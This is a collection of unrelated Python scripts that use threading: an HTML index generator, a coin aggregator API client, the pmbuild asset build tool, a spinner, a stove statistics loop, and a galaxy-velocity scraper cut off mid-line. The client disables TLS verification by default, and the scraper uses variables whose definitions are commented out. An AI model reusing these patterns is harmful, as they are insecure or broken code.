#!/usr/bin/env python3 import sys import os import re import yaml import threading from pathlib import Path def gen_files_list(files, prefix=""): files_link_content="" template_link_content= \ """\t<a href=\"<url>\"><name></a> \t<p>(<description>)</p>""" for file in files: print(" file : ", file) darkmode_pdf = False if file[len(file)-9:] == "-dark.pdf": config_file = file[:-9]+'.yaml' darkmode_pdf = True else: config_file = file[:-4]+'.yaml' print("config_file : "+config_file) config = load_config(config_file) name = "Unknown file" desc = "Empty description" if config: name = config["name"] desc = config["description"] if darkmode_pdf: name += " (dark)" desc += " - dark mode" buff = template_link_content file = file.replace("\\","/") buff = re.sub('<url>', prefix+file.split('/')[-1], buff) buff = re.sub('<name>', name, buff) buff = re.sub('<description>', desc, buff) files_link_content += buff +'\n' return files_link_content def generate_content(matiere, pdfs, images, file_path, configs=None): content = Path("sample_subject_webpage.html").read_text() auth = "The author" desc = "The description" title = "The Title" print("config : ",configs) if configs != None: auth = configs["author"] desc = configs["description"] title = configs["title"] content = re.sub('<thedescription>',desc, content) content = re.sub('<theauthor>',auth, content) content = re.sub('<thetitle>',title, content) files_link_content = gen_files_list(pdfs) images_link_content = gen_files_list(images, "images/") content = re.sub('<thefiles>', files_link_content, content) content = re.sub('<theimages>', images_link_content, content) file = open(file_path, "w+") file.write(content) def load_config(yaml_configfile): try: content = open(yaml_configfile) except: return None return yaml.load(content, Loader=yaml.SafeLoader) def list_pdfs(path): files = [] for file in os.listdir(path): if file.endswith(".pdf"): files.append(os.path.join(path, file)) return files def list_images(path): files = [] try: for file in os.listdir(path): if file.endswith(".jpg") or file.endswith(".jpeg"): files.append(os.path.join(path, file)) except: print("No images") return files threads = [] for line in sys.stdin: mat = line.strip() print("args : ", mat) file_path = "./"+mat+"/index.html" print("file path : '"+file_path+"'") pdfs = list_pdfs("./"+mat) images = list_images("./"+mat+"/images") generate_content(mat, pdfs, images, file_path, load_config("./"+mat+"/info.yaml")) thread = threading.Thread(target=generate_content, args=(mat, pdfs, images, file_path, load_config("./"+mat+"/info.yaml"))) thread.start() threads.append(thread) for thread in threads: thread.join()
aggregator_client.py
import json import threading import requests import websocket from .exceptions import RequestFailedException class AggregatorClient(object): def __init__(self, base_url, ws_url, verify=False, timeout=5): self.base_url = base_url self.verify = verify self.timeout = timeout # self.ws = websocket.WebSocketApp(ws_url, on_message=self.ws_on_message) # self.ws_callback = {} # threading.Thread(target=self.ws.run_forever).start() # def ws_on_message(self, ws, message): # data = json.loads(message) # if callable(self.ws_callback[data['event']]): # self.ws_callback[data['event']](data['arg']) # def emit(self, event, arg): # self.ws.send(json.dumps({'event': event, 'arg': arg}, sort_keys=True)) # def on(self, event, callback): # self.ws_callback[event] = callback def request(self, end_point, method, params=None, data=None, headers=None): url = self.base_url + end_point response = requests.request( method=method, url=url, params=params, data=data, headers=headers, verify=self.verify, timeout=self.timeout, ) if response.ok: return response else: raise RequestFailedException( 'failed reason: {}, text: {}'.format( response.reason, response.text) ) def get_owner(self, uid): end_point = f'/owner/{uid}' response = self.request(end_point, 'GET') return response.text def get_coins(self, owner): end_point = f'/coins/{owner}' response = self.request(end_point, 'GET') return response.text def get_proof(self, uid): end_point = f'/proof/{uid}' response = self.request(end_point, 'GET') return response.text def send_transaction(self, uid, to): # , sig): end_point = '/send_tx' data = {'uid': uid, 'to': to} #, 'sig': sig} response = self.request(end_point, 'POST', data=data) return response.text def submit_state(self): end_point = '/aggregator/submit_state' self.request(end_point, 'POST')
pmbuild.py
import collections import sys import os.path import json import fnmatch import util import subprocess import platform import shutil import time import dependencies import glob import threading import jsn.jsn as jsn import cgu.cgu as cgu # returns tool to run from cmdline with .exe def tool_to_platform(tool): tool = util.sanitize_file_path(tool) tool = tool.replace("$platform", util.get_platform_name()) if platform.system() == "Windows": tool += ".exe" return tool # ensure running with python3 or py -3 def python_tool_to_platform(tool): tool = util.sanitize_file_path(tool) if platform.system() == "Windows": tool = "py -3 " + tool else: tool = "python3 " + tool return tool # ches if file is excluded based on know files to ignore def is_excluded(file): excluded_files = [".DS_Store"] for ex in excluded_files: if file.find(ex) != -1: return True return False # writes a required value input by the user, into config.user.jsn def update_user_config(k, v, config): config[k] = v user = dict() if os.path.exists("config.user.jsn"): user = jsn.loads(open("config.user.jsn", "r").read()) user[k] = v bj = open("config.user.jsn", "w+") bj.write(json.dumps(user, indent=4)) bj.close() # locate latest version of the windows sdk def locate_windows_sdk(): pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"] sdk = "Windows Kits" sdk_dir = None for v in pf_env: print(v) d = os.environ[v] if d: if sdk in os.listdir(d): print(sdk) print(d) sdk_dir = os.path.join(d, sdk) break if sdk_dir: versions = sorted(os.listdir(sdk_dir), reverse=False) if len(versions) > 0: if versions[0] == "10": # windows 10 has sub versions source = os.path.join(sdk_dir, versions[0], "Source") if os.path.exists(source): sub_versions = sorted(os.listdir(source), reverse=False) if len(sub_versions) > 0: return str(sub_versions[0]) else: # 8.1 return str(versions[0]) return None # windows only, prompt user to supply their windows sdk version def configure_windows_sdk(config): if "sdk_version" in config.keys(): return # attempt to auto locate auto_sdk = locate_windows_sdk() if auto_sdk: update_user_config("sdk_version", auto_sdk, config) return print("Windows SDK version not set.") print("Please enter the windows sdk you want to use.") print("You can find available sdk versions in:") print("Visual Studio > Project Properties > General > Windows SDK Version.") input_sdk = str(input()) update_user_config("sdk_version", input_sdk, config) return # find visual studio installation directory def locate_vs_root(): pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"] vs = "Microsoft Visual Studio" vs_dir = "" for v in pf_env: d = os.environ[v] if d: if vs in os.listdir(d): vs_dir = os.path.join(d, vs) break return vs_dir # find latest visual studio version def locate_vs_latest(): vs_dir = locate_vs_root() if len(vs_dir) == 0: print("[warning]: could not auto locate visual studio, using vs2017 as default") return "vs2017" supported = ["2017", "2019"] versions = sorted(os.listdir(vs_dir), reverse=False) for v in versions: if v in supported: return "vs" + v # attempt to locate vc vars all by lookin in prgoram files, and finding visual studio installations def locate_vc_vars_all(): vs_dir = locate_vs_root() if len(vs_dir) == 0: return None pattern = os.path.join(vs_dir, "**/vcvarsall.bat") # if we reverse sort then we get the latest vs version vc_vars = sorted(glob.glob(pattern, recursive=True), reverse=False) if len(vc_vars) > 0: return vc_vars[0] return None # windows only, configure vcvarsall directory for commandline vc compilation def configure_vc_vars_all(config): # already exists if "vcvarsall_dir" in config.keys(): if os.path.exists(config["vcvarsall_dir"]): return # attempt to auto locate auto_vc_vars = locate_vc_vars_all() if auto_vc_vars: auto_vc_vars = os.path.dirname(auto_vc_vars) update_user_config("vcvarsall_dir", auto_vc_vars, config) return # user input while True: print("Cannot find 'vcvarsall.bat'") print("Please enter the full path to the vc2017/vc2019 installation directory containing vcvarsall.bat") input_dir = str(input()) input_dir = input_dir.strip("\"") input_dir = os.path.normpath(input_dir) if os.path.isfile(input_dir): input_dir = os.path.dirname(input_dir) if os.path.exists(input_dir): update_user_config("vcvarsall_dir", input_dir, config) return else: time.sleep(1) # apple only, ask user for their team id to insert into xcode projects def configure_teamid(config): if "teamid" in config.keys(): return print("Apple Developer Team ID not set.") print("Please enter your development team ID ie. (7C3Y44TX5K)") print("You can find team id's or personal team id on the Apple Developer website") print("Optionally leave this blank and you select a team later in xcode:") print(" Project > Signing & Capabilities > Team") input_sdk = str(input()) update_user_config("teamid", input_sdk, config) return # configure user settings for each platform def configure_user(config, args): config_user = dict() if os.path.exists("config.user.jsn"): config_user = jsn.loads(open("config.user.jsn", "r").read()) if util.get_platform_name() == "win32": if "-msbuild" not in sys.argv: configure_vc_vars_all(config_user) configure_windows_sdk(config_user) if os.path.exists("config.user.jsn"): config_user = jsn.loads(open("config.user.jsn", "r").read()) util.merge_dicts(config, config_user) # look for export.json in directory tree, combine and override exports by depth, override further by fnmatch def export_config_for_directory(filedir, platform): filepath = util.sanitize_file_path(filedir) dirtree = filepath.split(os.sep) export_dict = dict() subdir = "" for i in range(0, len(dirtree)): subdir = os.path.join(subdir, dirtree[i]) export = os.path.join(subdir, "export.jsn") if os.path.exists(export): dir_dict = jsn.loads(open(export, "r").read()) util.merge_dicts(export_dict, dir_dict) if platform in export_dict.keys(): util.merge_dicts(export_dict, export_dict[platform]) return export_dict # get file specific export config from the directory config checking for fnmatch on the basename def export_config_for_file(filename): dir_config = export_config_for_directory(os.path.dirname(filename), "osx") bn = os.path.basename(filename) for k in dir_config.keys(): if fnmatch.fnmatch(k, bn): file_dict = dir_config[k] util.merge_dicts(dir_config, file_dict) return dir_config # get files for task, will iterate dirs, match wildcards or return single files, returned in tuple (src, dst) def get_task_files(task): outputs = [] if len(task) != 2: print("[error] file tasks must be an array of size 2 [src, dst]") exit(1) fn = task[0].find("*") if fn != -1: # wildcards fnroot = task[0][:fn - 1] for root, dirs, files in os.walk(fnroot): for file in files: src = util.sanitize_file_path(os.path.join(root, file)) if is_excluded(src): continue if fnmatch.fnmatch(src, task[0]): dst = src.replace(util.sanitize_file_path(fnroot), util.sanitize_file_path(task[1])) outputs.append((src, dst)) elif os.path.isdir(task[0]): # dir for root, dirs, files in os.walk(task[0]): for file in files: src = util.sanitize_file_path(os.path.join(root, file)) if is_excluded(src): continue dst = src.replace(util.sanitize_file_path(task[0]), util.sanitize_file_path(task[1])) outputs.append((src, dst)) else: # single file if not is_excluded(task[0]): outputs.append((task[0], task[1])) return outputs # get files for a task sorted by directory def get_task_files_containers(task): container_ext = ".cont" files = get_task_files(task) container_files = [] skip = 0 for fi in range(0, len(files)): if fi < skip: continue f = files[fi] cpos = f[0].find(container_ext) if cpos != -1: container_name = f[0][:cpos + len(container_ext)] export = export_config_for_directory(container_name, "osx") container_src = container_name + "/container.txt" container_dst = os.path.dirname(f[1]) container_dir = os.path.dirname(f[0]) cf = (container_src, container_dst) file_list = "" # list of files in json if "files" in export: for xf in export["files"]: file_list += os.path.join(container_name, xf) + "\n" # otherwise take all files in the directory else: dir_files = sorted(os.listdir(container_dir)) for xf in dir_files: if xf.endswith(".jsn") or xf.endswith(".DS_Store") or xf.endswith(".txt"): continue file_list += os.path.join(container_name, xf) + "\n" update_container = False if os.path.exists(container_src): cur_container = open(container_src, "r").read() if cur_container != file_list: update_container = True else: update_container = True if update_container: open(container_src, "w+").write(file_list) container_files.append(cf) for gi in range(fi+1, len(files)): ff = files[gi] cur_container_name = ff[0][:cpos + len(container_ext)] if cur_container_name != container_name: skip = gi break else: container_files.append(f) return container_files # gets a list of files within container to track in dependencies def get_container_dep_inputs(container_filepath, dep_inputs): cf = open(container_filepath, "r").read().split("\n") for cff in cf: dep_inputs.append(cff) return dep_inputs # set visual studio version for building def run_vs_version(config): supported_versions = [ "vs2017", "vs2019" ] version = config["vs_version"] if version == "latest": config["vs_version"] = locate_vs_latest() print("setting vs_version to: " + config["vs_version"]) return config else: if version not in supported_versions: print("[error]: unsupported visual studio version " + str(version)) print(" supported versions are " + str(supported_versions)) # copy files, directories or wildcards def run_copy(config): print("--------------------------------------------------------------------------------") print("copy ---------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") copy_tasks = config["copy"] for task in copy_tasks: files = get_task_files(task) for f in files: util.copy_file_create_dir_if_newer(f[0], f[1]) # single jsn job to run on a thread def run_jsn_thread(f, ii, config, jsn_tasks): cmd = python_tool_to_platform(config["tools"]["jsn"]) cmd += " -i " + f[0] + " -o " + f[1] + ii imports = jsn.get_import_file_list(f[0], jsn_tasks["import_dirs"]) inputs = [f[0], config["tools"]["jsn"]] for im in imports: inputs.append(im) dep = dependencies.create_dependency_info(inputs, [f[1]], cmd) if not dependencies.check_up_to_date_single(f[1], dep): subprocess.call(cmd, shell=True) dependencies.write_to_file_single(dep, util.change_ext(f[1], ".dep")) # convert jsn to json for use at runtime def run_jsn(config): print("--------------------------------------------------------------------------------") print("jsn ----------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") threads = [] jsn_tasks = config["jsn"] ii = " -I " for i in jsn_tasks["import_dirs"]: ii += i + " " for task in jsn_tasks["files"]: files = get_task_files(task) for f in files: if not os.path.exists(f[0]): print("[warning]: file or directory " + f[0] + " does not exist!") continue x = threading.Thread(target=run_jsn_thread, args=(f, ii, config, jsn_tasks)) threads.append(x) x.start() for t in threads: t.join() # premake def run_premake(config): print("--------------------------------------------------------------------------------") print("premake ------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") cmd = tool_to_platform(config["tools"]["premake"]) for c in config["premake"]: if c == "vs_version": c = config["vs_version"] cmd += " " + c # add pmtech dir cmd += " --pmtech_dir=\"" + config["env"]["pmtech_dir"] + "\"" # add sdk version for windows if "sdk_version" in config.keys(): cmd += " --sdk_version=\"" + str(config["sdk_version"]) + "\"" # check for teamid if "require_teamid" in config: if config["require_teamid"]: configure_teamid(config) cmd += " --teamid=\"" + config["teamid"] + "\"" subprocess.call(cmd, shell=True) # pmfx def run_pmfx(config): cmd = python_tool_to_platform(config["tools"]["pmfx"]) for c in config["pmfx"]: cmd += " " + c subprocess.call(cmd, shell=True) # single model build / optimise ran on a separate thread def run_models_thread(cmd): p = subprocess.Popen(cmd, shell=True) p.wait() # models def run_models(config): print("--------------------------------------------------------------------------------") print("models -------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") tool_cmd = python_tool_to_platform(config["tools"]["models"]) threads = [] for task in config["models"]: task_files = get_task_files(task) mesh_opt = "" if os.path.exists(config["tools"]["mesh_opt"]): mesh_opt = config["tools"]["mesh_opt"] for f in task_files: cmd = " -i " + f[0] + " -o " + os.path.dirname(f[1]) if len(mesh_opt) > 0: cmd += " -mesh_opt " + mesh_opt x = threading.Thread(target=run_models_thread, args=(tool_cmd + cmd,)) threads.append(x) x.start() for t in threads: t.join() # build third_party libs def run_libs(config): print("--------------------------------------------------------------------------------") print("libs ---------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") shell = ["linux", "osx", "ios"] cmd = "" for arg in config["libs"]: cmd = arg if util.get_platform_name() in shell: pass else: args = "" args += config["env"]["pmtech_dir"] + "/" + " " args += config["sdk_version"] + " " if "vs_version" not in config: config["vs_version"] = "vs2017" args += config["vs_version"] + " " cmd += "\"" + config["vcvarsall_dir"] + "\"" + " " + args print(cmd) p = subprocess.Popen(cmd, shell=True) p.wait() # textures def run_textures(config): print("--------------------------------------------------------------------------------") print("textures -----------------------------------------------------------------------") print("--------------------------------------------------------------------------------") tool_cmd = tool_to_platform(config["tools"]["texturec"]) for task in config["textures"]: files = get_task_files_containers(task) for f in files: copy_fmt = [".dds", ".pmv"] conv_fmt = [".png", ".jpg", ".tga", ".bmp", ".txt"] cont_fmt = [".txt"] fext = os.path.splitext(f[0])[1] if fext in copy_fmt: util.copy_file_create_dir_if_newer(f[0], f[1]) if fext in conv_fmt: export = export_config_for_file(f[0]) dep_inputs = [f[0], config["tools"]["texturec"]] if fext in cont_fmt: export = export_config_for_directory(f[0], "osx") dep_inputs = get_container_dep_inputs(f[0], dep_inputs) dst = util.change_ext(f[1], ".dds").lower() # to refactor if "format" not in export.keys(): export["format"] = "RGBA8" cmd = tool_cmd + " " cmd += "-f " + f[0] + " " cmd += "-t " + export["format"] + " " if "cubemap" in export.keys() and export["cubemap"]: cmd += " --cubearray " if "mips" in export.keys() and export["mips"]: cmd += " --mips " cmd += "-o " + dst dep = dependencies.create_dependency_info(dep_inputs, [dst], cmd) if not dependencies.check_up_to_date_single(dst, dep): util.create_dir(dst) subprocess.call(cmd, shell=True) dependencies.write_to_file_single(dep, util.change_ext(dst, ".dep")) # clean def run_clean(config): print("--------------------------------------------------------------------------------") print("clean --------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") for clean_task in config["clean"]: if os.path.isfile(clean_task): print("file " + clean_task) os.remove(clean_task) elif os.path.isdir(clean_task): print("directory " + clean_task) shutil.rmtree(clean_task) # generates metadata json to put in data root dir, for doing hot loading and other re-build tasks def generate_pmbuild_config(config, profile): print("--------------------------------------------------------------------------------") print("pmbuild live reload config -----------------------------------------------------") print("--------------------------------------------------------------------------------") if "data_dir" not in config: print("[error]: did not generate pmbuild_config.json for live reloading") return print("writing " + config["data_dir"] + "/" + "pmbuild_config.json") wd = os.getcwd() pmd = util.sanitize_file_path(config["env"]["pmtech_dir"]) md = { "profile": profile, "pmtech_dir": pmd, "pmbuild": "cd " + wd + " && " + pmd + "pmbuild " + profile + " " } util.create_dir(config["data_dir"]) f = open(os.path.join(config["data_dir"], "pmbuild_config.json"), "w+") f.write(json.dumps(md, indent=4)) # gets a commandline to setup vcvars for msbuil from command line def setup_vcvars(config): return "pushd \ && cd \"" + config["vcvarsall_dir"] + "\" && vcvarsall.bat x86_amd64 && popd" # run build commands def run_build(config): print("--------------------------------------------------------------------------------") print("build --------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") for build_task in config["build"]: if util.get_platform_name() == "win32": build_task = setup_vcvars(config) + " && " + build_task p = subprocess.Popen(build_task, shell=True) e = p.wait() if e != 0: exit(0) def run_cr(config): print("--------------------------------------------------------------------------------") print("cr -----------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print(config["cr"]["output"]) files = config["cr"]["files"] free_funcs = [] added = [] for f in files: source = open(f, "r").read() source = cgu.remove_comments(source) strings, source = cgu.placeholder_string_literals(source) functions, function_names = cgu.find_functions(source) for func in functions: free = len(func["qualifier"]) == 0 for s in func["scope"]: if s["type"] == "struct": free = False break # cant add members if not free: continue # cant add overloads if func["name"] in added: continue added.append(func["name"]) free_funcs.append(func) # start writing code code = cgu.src_line("// codegen_2") code += cgu.src_line("#pragma once") for f in files: code += cgu.src_line('#include ' + cgu.in_quotes(os.path.basename(f))) # use namespaces code += cgu.src_line("namespace put {") # sort by immediate scope scope_funcs = dict() for f in free_funcs: l = len(f["scope"]) if l > 0: s = f["scope"][l-1]["name"] if s not in scope_funcs.keys(): scope_funcs[s] = list() scope_funcs[s].append(f) # add bindings grouped by scope for scope in scope_funcs: code += cgu.src_line("namespace " + scope + "{") # function pointer typedefs for f in scope_funcs[scope]: args = cgu.get_funtion_prototype(f) code += cgu.src_line("typedef " + f["return_type"] + " (*proc_" + f["name"] + ")" + args + ";") # struct struct_name = "__" + scope code += cgu.src_line("struct " + struct_name + " {") code += cgu.src_line("void* " + struct_name + "_start;") # function pointers members for f in scope_funcs[scope]: code += cgu.src_line("proc_" + f["name"] + " " + f["name"] + ";") code += cgu.src_line("void* " + struct_name + "_end;") code += cgu.src_line("};") # bind function pointers to addresses code += cgu.src_line("#if !DLL") code += cgu.src_line("void generate_bindings(" + struct_name + "* ctx){") for f in scope_funcs[scope]: code += cgu.src_line("ctx->" + f["name"] + " = &" + f["name"] + ";") code += cgu.src_line("}") code += cgu.src_line("#endif") code += cgu.src_line("}") # pointers to contexts code += cgu.src_line("struct live_context {") code += cgu.src_line("f32 dt;") code += cgu.src_line("pen::render_ctx render;") code += cgu.src_line("ecs::ecs_scene* scene;") for scope in scope_funcs: code += cgu.src_line(scope + "::__" + scope + "* " + scope + "_funcs;") code += cgu.src_line("};") code += cgu.src_line("}") # namespace put output_file = open(config["cr"]["output"], "w") output_file.write(cgu.format_source(code, 4)) return # top level help def pmbuild_help(config): print("pmbuild -help ------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("\nusage: pmbuild <profile> <tasks...>") print("\noptions:") print(" -help (display this dialog).") print(" -<task> -help (display task help).") print(" -cfg (print jsn config for current profile).") print(" -msbuild (indicates msbuild prompt and no need to call vcvarsall.bat") print("\nprofiles:") print(" config.jsn (edit task settings in here)") for p in config.keys(): print(" " * 8 + p) print("\ntasks (in order of execution):") print(" -all (builds all tasks).") print(" -n<task name> (excludes task).") print(" -clean (delete specified directories).") print(" -libs (build thirdparty libs).") print(" -premake (run premake, generate ide projects).") print(" -models (convert to binary model, skeleton and material format).") print(" -pmfx (shader compilation, code-gen, meta-data gen).") print(" -textures (convert, compress, generate mip-maps, arrays, cubemaps).") print(" -copy (copy files, folders or wildcards) [src, dst].") print("\n") def clean_help(config): print("clean help ---------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("removes all intermediate and temp directories:") print("\njsn syntax: array of [directories to remove...].") print("clean: [") print(" [<rm dir>],") print(" ...") print("]") print("\n") def vs_version_help(config): print("vs version help ---------------------------------------------------------------") print("-------------------------------------------------------------------------------") print("select version of visual studio for building libs and porjects:") print("\njsn syntax:") print("vs_version: <version>") print("\n") print("version options:") print(" latest (will choose latest version installed on your machine)") print(" vs2017 (minimum supported compiler)") print(" vs2019") print("\n") def libs_help(config): print("libs help ----------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("builds tools and third-party libraries:") print("\njsn syntax: array of [cmdlines, ..]") print("libs: [") print(" [\"command line\"],") print(" ...") print("]\n") print("reguires:") print(" config[\"env\"][\"pmtech_dir\"]") print(" win32:") print(" config[\"sdk_version\"]") print(" config[\"vcvarsall_dir\"]") print("\n") def premake_help(config): print("premake help -------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("generate ide projects or make files from lua descriptions:") print("\njsn syntax: array of [<action>, cmdline options..]") print("premake: [") print(" [\"<action> (vs2017, xcode4, gmake, android-studio)\"],") print(" [\"--premake_option <value>\"],") print(" ...") print("]\n") print("reguires: config[\"env\"][\"pmtech_dir\"]\n") cmd = tool_to_platform(config["tools"]["premake"]) cmd += " --help" subprocess.call(cmd, shell=True) print("\n") def pmfx_help(config): print("pmfx help ----------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("compile platform specific shaders:") print("\njsn syntax: array of [cmdline options, ..]") print("pmfx: [") print(" [\"-pmfx_option <value>\"],") print(" ...") print("]\n") cmd = python_tool_to_platform(config["tools"]["pmfx"]) cmd += " -help" subprocess.call(cmd, shell=True) print("\n") def models_help(config): print("models help --------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("create binary pmm and pma model files from collada files:") print("\njsn syntax: array of [src, dst] pairs.") print("models: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("accepted file formats: .dae, .obj") print("\n") def textures_help(config): print("textures help ------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("convert, re-size or compress textures:") print("\njsn syntax: array of [src, dst] pairs.") print("copy: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("export.jsn:") print("{") print(" format: \"RGBA8\"") print(" filename.png {") print(" format: \"override_per_file\"") print(" }") print("}\n") tool_cmd = tool_to_platform(config["tools"]["texturec"]) subprocess.call(tool_cmd + " --help", shell=True) subprocess.call(tool_cmd + " --formats", shell=True) print("\n") def copy_help(config): print("copy help ----------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("copy files from src to dst:") print("\njsn syntax: array of [src, dst] pairs.") print("copy: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("\n") def jsn_help(config): print("jsn help ----------------------------------------------------------------------") print("-------------------------------------------------------------------------------") print("convert jsn to json:") print("\njsn syntax: array of [src, dst] pairs.") print("jsn: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("\n") def build_help(config): print("build help ----------------------------------------------------------------------") print("---------------------------------------------------------------------------------") print("\njsn syntax: array of commands.") print("build: [") print(" command args args args,") print(" ...") print("]") print("\n") def cr_help(config): print("cr help -------------------------------------------------------------------------") print("---------------------------------------------------------------------------------") print("generate cfunction pointers for calling from fungos/cr") print("\njsn syntax: array of commands.") print("cr: {") print(" files:[...], output: <filepath>") print("}") print("\n") # print duration of job, ts is start time def print_duration(ts): millis = int((time.time() - ts) * 1000) print("--------------------------------------------------------------------------------") print("Took (" + str(millis) + "ms)") # main function def main(): start_time = time.time() # must have config.json in working directory if not os.path.exists("config.jsn"): print("[error] no config.json in current directory.") exit(1) # load jsn, inherit etc config_all = jsn.loads(open("config.jsn", "r").read()) # top level help if "-help" in sys.argv or len(sys.argv) == 1: if len(sys.argv) <= 2: pmbuild_help(config_all) exit(0) call = "run" if "-help" in sys.argv: call = "help" # first arg is build profile if call == "run": config = config_all[sys.argv[1]] # load config user for user specific values (sdk version, vcvarsall.bat etc.) configure_user(config, sys.argv) if "-cfg" in sys.argv: print(json.dumps(config, indent=4)) else: config = config_all["base"] # tasks are executed in order they are declared here tasks = collections.OrderedDict() tasks["vs_version"] = {"run": run_vs_version, "help": vs_version_help} tasks["libs"] = {"run": run_libs, "help": libs_help} tasks["premake"] = {"run": run_premake, "help": premake_help} tasks["pmfx"] = {"run": run_pmfx, "help": pmfx_help} tasks["models"] = {"run": run_models, "help": models_help} tasks["textures"] = {"run": run_textures, "help": textures_help} tasks["jsn"] = {"run": run_jsn, "help": jsn_help} tasks["copy"] = {"run": run_copy, "help": copy_help} tasks["build"] = {"run": run_build, "help": build_help} tasks["cr"] = {"run": run_cr, "help": cr_help} # clean is a special task, you must specify separately if "-clean" in sys.argv: if call == "help": clean_help(config) else: run_clean(config) # run tasks in order they are specified. for key in tasks.keys(): if call == "run": if key not in config.keys(): continue ts = time.time() run = False # check flags to include or exclude jobs if "-all" in sys.argv and "-n" + key not in sys.argv: run = True elif len(sys.argv) != 2 and "-" + key in sys.argv: run = True elif len(sys.argv) == 2: run = True # run job if run: tasks.get(key, lambda config: '')[call](config) print_duration(ts) # finally metadata for rebuilding and hot reloading generate_pmbuild_config(config, sys.argv[1]) print("--------------------------------------------------------------------------------") print("all jobs complete --------------------------------------------------------------") print_duration(start_time) # entry point of pmbuild if __name__ == "__main__": print("--------------------------------------------------------------------------------") print("pmbuild (v3) -------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("") main()
spinner.py
#!/usr/bin/env python import itertools import sys import time import threading import platform class Spinner(object): spinner_cycle = [ " [🥞 ]", " [ 🥞 ]", " [ 🥞 ]", " [ 🥞]", " [ 🥞 ]", " [ 🥞 ]", " [🥞 ]", ] if platform.system() == "Darwin" else itertools.cycle(['-', '/', '|', '\\']) i = 0 def __init__(self): self.emojiSupported = platform.system() == "Darwin" self.stop_running = threading.Event() self.spin_thread = threading.Thread(target=self.init_spin) def start(self): # self.stop() self.spin_thread.start() def stop(self): try: self.stop_running.set() self.spin_thread.join() except: pass def init_spin(self): while not self.stop_running.is_set(): # sys.stdout.write(self.spinner_cycle.next()) # .next() deprecated in python3 apparently if self.emojiSupported: # sys.stdout.write(self.spinner_cycle[self.i % len(self.spinner_cycle)] + "\r")#, end="\r") print(self.spinner_cycle[self.i % len(self.spinner_cycle)] , end="\r") time.sleep(.1) self.i += 1 else: # last working code below sys.stdout.write(next(self.spinner_cycle)) sys.stdout.flush() time.sleep(0.25) sys.stdout.write('\b')
Statistik.py
# -*- coding: utf-8 -*- import Tools import sensor_temperature_control as TempSensor import math import time import threading runStatistik=True def setStatistik(): global runStatistik runStatistik=True #starte Thread für das warten bis Statistik beendet wird thread_temp = threading.Thread(target=__stopStatistik).start() print("Werte für Statistik werden abgerufen") while runStatistik: print("neue Runde") ## TempRauchgas = TempSensor.getTempRauchgas() ## TempRaum = TempSensor.getTempRaumTemp() ## if TempRauchgas < 0: ## TempRauchgas = 0 ## if TempRaum < 0: ## TempRaum = 0 ## Tools.sendcommand('add 9,1,' + math.ceil(TempRauchgas)) ##Tools.sendcommand('add 9,2,' + math.ceil(TempRaum)) ##print("Schreibe Temperatur in Statisktik (Rauchgas):" + TempRauchgas) ##print("Schreibe Temperatur in Statisktik (Raum):" + TempRaum) Tools.sendcommand("add 9,1,150") Tools.sendcommand("add 9,0,100") time.sleep(0.5) def __stopStatistik(): global runStatistik Tools.leereInputBuffer() #Input Buffer löschen if Tools.recievecommand()=="s9b0": print("Statistik wurde vom User beendet") runStatistik=False
velocities.py
import requests import itertools import threading import time import sys def animate(): for c in itertools.cycle(['|', '/', '-', '\\']): if done: break sys.stdout.write('\rloading ' + c) sys.stdout.flush() time.sleep(0.1) print(chr(27) + "[2J") sys.stdout.write('\rDone!') def getVelocities(name,link): inputs = {'objname': name, 'extend': 'no', 'hconst': '73', 'omegam': '0.27', 'omegav': '0.73', 'corr_z': '1', 'out_csys': 'Equatorial', 'out_equinox': 'J2000.0', 'obj_sort': "RA or Longitude", 'of': 'pre_text', 'zv_breaker': '30000.0', 'list_limit': '5', 'img_stamp': 'YES'} page = requests.get(link, params = inputs) from bs4 import BeautifulSoup soup = BeautifulSoup(page.content, 'html.parser') #-------Get Velocities-----# # velocities = soup.find_all('pre')[5] # Helio = list(velocities.children)[2] # VGS = list(velocities.children)[16] # Helio = Helio.lstrip('\n') # VGS = VGS.lstrip('\n') # Hvals = [int(s) for s in Helio.split() if s.isdigit()] # VGSVals = [int(s) for s in VGS.split() if s.isdigit()] #-----End Get Velocities-----# #-----Get Diameters-----# diameters = soup.find_all('table')[22] at = diameters.find('tr') print(at.get_text) diameters = diameters.find_all('tr')[0] major = diameters.find_all('td')[1].get_text() minor = diameters.find_all('td')[2].get_text() #-----End Get Diameters-----# write_file = 'Data.csv' with open(write_file, 'a') as output: output.write(name + ',' + str(Hvals[0]) + ',' + str(Hvals[1]) + ',' + str(VGSVals[0]) + ',' + str(VGSVals[1]) + ',' + major + ',' + minor + '\n') #-----SETUP-----# link = "https://ned.ipac.caltech.edu/cgi-bin/objsearch?" gals = [] can_read = False while can_read == False: choice = input("Enter [1] to enter galaxies by hand. Enter [2] to import a .txt file of names.\n") if choice == '1': galaxies = input("Enter galaxies separated by commas: Ex. M82, M83\n") for x in galaxies.split(','): gals.append(x.strip()) can_read = True elif choice == '2': file = input("What is the name of the file? Ex. galaxies.txt\n\n") with open(file) as inp: gals = inp.read().splitlines() can_read = True else: print("Please enter either [1] or [2]\n\n") done = False print(chr(27) + "[2J") threader = threading.Thread(target=animate) threader.start() write_file = 'Data.csv' with open(write_file, 'w') as output: output.write("Name, Heliocentric Velocity (km/s), Uncertainty (km/s), VGS Velocity (km/s), Uncertainty (km/s), Apparent Major Axis (arcsec), Apparent Minor 